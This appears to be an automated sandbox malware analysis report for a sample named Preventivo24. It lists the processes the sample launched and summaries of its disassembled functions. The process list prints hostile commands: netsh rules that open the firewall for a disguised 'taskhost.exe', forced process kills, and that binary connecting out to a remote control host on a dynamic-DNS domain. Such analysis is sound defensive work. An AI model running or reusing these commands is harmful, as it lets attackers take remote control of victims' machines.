Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:08:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\mode.com
Wow64 process (32bit):	true
Commandline:	Mode 90,20
Imagebase:	0x2d0000
File size:	26'624 bytes
MD5 hash:	FB615848338231CEBC16E32A3035C3F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:08:08
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:08:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x630000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:08:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:08:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:08:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0x760000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:08:09
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "taskhost.exe"
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:08:11
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x630000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:08:11
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:08:11
Start date:	23/01/2024
Path:	C:\Games\taskhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Imagebase:	0x580000
File size:	2'648'008 bytes
MD5 hash:	663FE548A57BBD487144EC8226A7A549
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Imagebase:	0x960000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Imagebase:	0x960000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7864, Parent PID: 8180

General

Target ID:	48
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7352, Parent PID: 4404

General

Target ID:	51
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: reg.exePID: 7376, Parent PID: 7352

General

Target ID:	52
Start time:	12:08:12
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xfa0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	12:08:13
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0x760000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	12:08:13
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "taskhost.exe"
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	12:08:32
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	12:08:52
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 20
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.2%
Total number of Nodes:	1224
Total number of Limit Nodes:	58

Executed Functions

Function 00B33C50 Relevance: 49.8, APIs: 11, Strings: 17, Instructions: 819libraryloaderCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C), ref: 00B33E90
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00B33F7A
GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 00B3409F

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 00B341A6

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 00B342E1
SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D), ref: 00B343C2
LoadLibraryW.KERNEL32(shfolder.dll), ref: 00B34452
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00B34492

Part of subcall function 00B27E90: LoadLibraryW.KERNEL32(Shlwapi.dll,-00000001,00000000,?,?,?,?,?,?,?,?,00B3456B,?), ref: 00B27EAF
Part of subcall function 00B27E90: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00B27EC5
Part of subcall function 00B27E90: FreeLibrary.KERNEL32(00000000), ref: 00B27F08

GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00B346B0
SHGetPathFromIDListW.SHELL32(?,?), ref: 00B34729
SHGetMalloc.SHELL32(00000000), ref: 00B34742

Strings

WindowsFolder, xrefs: 00B34013, 00B34028, 00B34032
System32Folder, xrefs: 00B33EEE, 00B33F03, 00B33F0D
Shell32.dll, xrefs: 00B3458D
SETUPEXEDIR, xrefs: 00B3428E
SHGetFolderPathW, xrefs: 00B3448C
WindowsVolume, xrefs: 00B3411F, 00B34134, 00B3413E
SystemFolder, xrefs: 00B33DF1, 00B33E06, 00B33E10
PROGRAMFILES, xrefs: 00B3468D
ProgramFiles, xrefs: 00B34605
ProgramFilesFolder, xrefs: 00B345D1
shfolder.dll, xrefs: 00B3444D
APPDATA, xrefs: 00B346A7, 00B346AF
AppDataFolder, xrefs: 00B34617, 00B34655
ProgramW6432, xrefs: 00B33CE4
TempFolder, xrefs: 00B341D2
ProgramFiles64Folder, xrefs: 00B33C88
Shlwapi.dll, xrefs: 00B34561

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DirectoryLibrary$AddressFolderLoadPathProcWindows$EnvironmentFileFindFreeFromHeapListLocationMallocModuleNameProcessResourceSpecialSystemVariable
String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
API String ID: 2967964373-2261365735
Opcode ID: 7e1b65659b58519d059e1a3af6717497bceff0dbb5f3ce889b02d8e8c256f52e
Instruction ID: a23b34e7bc7cfc2f80dbd03b24721ede9dd0615ad2d506762f0c8fc5316a83cd
Opcode Fuzzy Hash: 7e1b65659b58519d059e1a3af6717497bceff0dbb5f3ce889b02d8e8c256f52e
Instruction Fuzzy Hash: 6762C570A006198BDB14DF24CC55BBE73F2EFA5714F6442E8E416973A1EB32AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B37CE0 Relevance: 36.4, APIs: 15, Strings: 5, Instructions: 1352libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

LoadLibraryExW.KERNEL32(00000000,00000000,00000001,00C5B076,00000000,00000000,00C5B076,00000000,?,?,00C5B076,000000FF), ref: 00B37E70

Strings

Full command line:, xrefs: 00B384D8
Command line to pass to MSI:, xrefs: 00B3858B
Advinst_, xrefs: 00B38865, 00B38877, 00B38881
====== Starting logging of ", xrefs: 00B37F2A, 00B37F3C, 00B37F46
" ====, xrefs: 00B37F6E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HeapLibraryLoadProcess
String ID: ====== Starting logging of "$" ====$Advinst_$Command line to pass to MSI:$Full command line:
API String ID: 3872204244-3828228616
Opcode ID: ba2b914c5d0222ee2e88c638fd632c09768fb7e048f430cf7dcf85c599c09392
Instruction ID: 9bcb059d0bddc8d300f41d4864e09c9ee994a75de15321fbd22c678caee816fe
Opcode Fuzzy Hash: ba2b914c5d0222ee2e88c638fd632c09768fb7e048f430cf7dcf85c599c09392
Instruction Fuzzy Hash: 9AB2BF71A006098BDB15DFA8C855BAEB7F5FF44310F2442A9E815AB3D2DF34AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B62440 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 500
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B624BB
GetLastError.KERNEL32 ref: 00B624C5
GetUserNameW.ADVAPI32(?,?), ref: 00B6250D
GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00B62547
GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 00B62592
RegDeleteValueW.KERNEL32(?,?,00000000,80000001,00000001,00000000,26FBC52C), ref: 00B62748
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000,26FBC52C), ref: 00B62778
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,26FBC52C,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B628CF
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 00B62908
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 00B62942
RegDeleteKeyW.ADVAPI32(?,00000000), ref: 00B62965
RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 00B629AA
RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00B62AAB
RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00B62AED

Strings

UserDomain, xrefs: 00B62542, 00B6258D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00B629C9
Software, xrefs: 00B62798

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Close$Delete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
API String ID: 1615433478-4079418357
Opcode ID: 81ddfe001c012ed37243a563f9c03d5963ce294b21407c622edfd74237efe274
Instruction ID: 6a5b1f238ebdde46434b6a1299e4b9a7d0a8ef43047df6a116033ef1d12a2bc3
Opcode Fuzzy Hash: 81ddfe001c012ed37243a563f9c03d5963ce294b21407c622edfd74237efe274
Instruction Fuzzy Hash: 51225A70D00249DBEF24DFA4CC99BEEBBB4EF54304F244599E405B7291DB786A88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A05220 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 725fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000), ref: 00A0536F
PathIsUNCW.SHLWAPI(00000000,*.*,00000000), ref: 00A05436
FindFirstFileW.KERNEL32(00000000,00000000,*.*,00000000), ref: 00A055C9
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A055E3
GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00A05620
FindClose.KERNEL32(00000000), ref: 00A05684
SetLastError.KERNEL32(0000007B), ref: 00A0568E
PathIsUNCW.SHLWAPI(?,?,26FBC52C,*.*,?), ref: 00A058F4

Strings

*.*, xrefs: 00A05398, 00A05403, 00A05404, 00A05816
\\?\, xrefs: 00A05547, 00A055B3, 00A05A0E, 00A05A79
\\?\UNC\, xrefs: 00A05456, 00A05531, 00A05916, 00A059F5

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Path$Find$CloseFullName$ErrorFileFirstLast
String ID: *.*$\\?\$\\?\UNC\
API String ID: 2310598285-1700010636
Opcode ID: ab581539111207816511b68cbb93ba65960d88242e991b2ea30008884ee63a1a
Instruction ID: 7bb2aa74ca5f20f7eace6269028b3b520b30b5248dd61b06bcf86c6568603b33
Opcode Fuzzy Hash: ab581539111207816511b68cbb93ba65960d88242e991b2ea30008884ee63a1a
Instruction Fuzzy Hash: 4442BD30A00A098FCB14DF68D889BAFB7B5FF54324F144268E8159B2E1DB76AD45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B46F90 Relevance: 16.7, APIs: 10, Instructions: 1737COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3caf517cd4d58e6722f7cd3f1809d6ab62818e021d44429b5cec6e9427981167
Instruction ID: ad9ad6abfd08180a7c3ede23d31c245ddbd776611c0a9f74b10dc1e3ce3a62f3
Opcode Fuzzy Hash: 3caf517cd4d58e6722f7cd3f1809d6ab62818e021d44429b5cec6e9427981167
Instruction Fuzzy Hash: 5503A9B09006588FDB24DB28CC547AEBBB1AF45314F1882D9E509A7392DB70AF85DF85

Uniqueness

Uniqueness Score: -1.00%

Function 00B19280 Relevance: 16.6, APIs: 11, Instructions: 119
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B192D2
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B192DF
GetLastError.KERNEL32 ref: 00B192E9
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00B1930D
GetLastError.KERNEL32 ref: 00B19317
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00B1933D
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B19374
EqualSid.ADVAPI32(00000000,?), ref: 00B19383
FreeSid.ADVAPI32(?), ref: 00B19392
FindCloseChangeNotification.KERNEL32(00000000), ref: 00B193CC

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
String ID:
API String ID: 2037597787-0
Opcode ID: 2b0d4b913919e4a4757885929a38ba6cfe2b7b124c37ddc020331c7747f93302
Instruction ID: 914622ed7e12cfc0d0834eb95ed41de600996c3598d13ca975925be0b4f1cd9b
Opcode Fuzzy Hash: 2b0d4b913919e4a4757885929a38ba6cfe2b7b124c37ddc020331c7747f93302
Instruction Fuzzy Hash: BF413471904259EFDF108FA0DC59BEEBBB8FF09314F504159E412F2290DB795A88DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B20CA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

